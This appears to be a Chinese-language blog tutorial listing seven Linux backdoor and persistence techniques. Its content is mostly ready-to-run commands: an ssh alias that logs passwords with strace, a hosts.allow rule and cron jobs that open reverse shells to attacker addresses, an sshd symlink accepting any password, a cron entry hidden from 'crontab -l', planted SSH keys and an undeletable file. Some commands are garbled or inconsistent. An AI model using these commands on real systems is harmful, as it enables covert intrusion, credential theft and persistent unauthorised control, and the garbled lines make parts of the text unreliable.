Linux几种留后门姿势
目录:
0x01,alias后门记录SSH密码
0x02,TCP Wrapper后门
0x03,软链接SSH后门
0x04,crontab后门
0x05,隐藏crontab后门
0x06,SSH公钥后门
0x07,创建不可删除文件
0x01,alias后门记录SSH密码
在Linux和其他类Unix系统中,alias是一个命令,用于创建命令别名。别名是用户自定义的命令缩写或替代形式,可以用来简化和定制命令行操作。
最终alias后门命令如下:
alias ssh='strace -o /tmp/sshpwd-`date '+%d%h%m%s'`.log -e read,write,connect -s2048 ssh'
1)先创建一个测试账号:testuser
2)ssh testuser@127.0.0.1登录该账号
3)查看日志
后门将终端的输入输出(输入的ssh地址账号密码)和连接信息保存到/tmp/sshpwd-日期.log中
0x02,TCP Wrapper后门
TCP Wrapper(也称为tcpd)是一种用于网络访问控制的软件工具。它在网络服务的前端提供了一层保护,允许系统管理员通过配置来限制对网络服务的访问。
最终TCP Wrapper后门命令如下:
echo 'ALL: ALL: spawn (bash -c "/bin/bash -i >& /dev/tcp/192.168.10.1/4444 0>&1") & :allow' > /etc/hosts.allow
上面是通过echo将TCP Wrapper规则写入文件/etc/hosts.allow
1)修改TCP Wrapper配置
2)反弹shell控制端
3)测试ssh登陆被控端机器
拿到被登录ssh机器的权限。
0x03,软链接SSH后门
软链接SSH后门命令:
ln -sf /usr/sbin/sshd /tmp/su;/tmp/su -oPort=12345
上述命令是一条Shell命令,它执行了两个操作:
-
ln -sf /usr/sbin/sshd /tmp/su:这部分命令将创建一个名为/tmp/su的符号链接,指向/usr/sbin/sshd文件。ln是Linux中用于创建链接的命令。-s选项表示创建一个符号链接,-f选项表示如果已存在目标文件,则先删除它。
-
/tmp/su -oPort=31337:这部分命令在后台执行/tmp/su,并使用-oPort=31337选项来指定连接远程主机的端口号。由于该命令执行在后台,因此不会在当前终端会话中显示任何输出。
1)执行该后门命令
2)查看目标主机的端口监听
3)cmd ssh连接,任意密码登陆
0x04,crontab后门
Cron计划任务后门,完整命令是:
(crontab-l;echo'*/1****/bin/bash/tmp/1.sh;/bin/bash--noprofile-i')|crontab-
/tmp/1.sh可以是反弹shell的脚本:
bash -i >& /dev/tcp/x.x.x.x/9999 0>&1
该命令将每分钟执行一次 /bin/bash /tmp/1.sh 脚本,并以交互模式启动一个新的 bash shell。
0x05,隐藏crontab后门
隐藏式Crontab后门命令是:
(crontab -l;printf "*/1 * * * * /bin/bash /tmp/1.sh;/bin/bash --noprofile -i;rno crontab for`whoami`%100cn")|crontab -
1)在crontab -l检查没有任何计划任务,执行上面命令
2)找一个vps nc监听
3)等待1分钟上线
4)执行crontab -l检查当前用户的计划任务为空
该后门无法通过crontab -l查看,可以通过这两种方式查看:
1)cat -A /var/spool/cron/root
2)crontab -e
0x06,SSH公钥后门
先简单介绍下SSH公钥登录:
1)生成SSH密钥对,一路回车即可
ssh-keygen -t rsa
2)在服务器上安装公钥:
cat id_rsa.pub >> authorized_keys
3)配置SSH,打开密钥登录功能
编辑 /etc/ssh/sshd_config 文件,进行如下设置:
PubkeyAuthentication yesPubkeyAuthentication yesPasswordAuthentication no最后,重启 SSH 服务:systemctl restart sshd
PasswordAuthentication no
最后,重启 SSH 服务:
systemctl restart sshd
4)下载私钥配置使用私钥登陆
0x07,创建不可删除文件
完整命令是:
echo 'whoami' > .. //最后一个后也有空格
这种方法建立的文件无法通过rm + tab 或rm -rf ./* 删除,除非知道文件名中包含多少个和空格
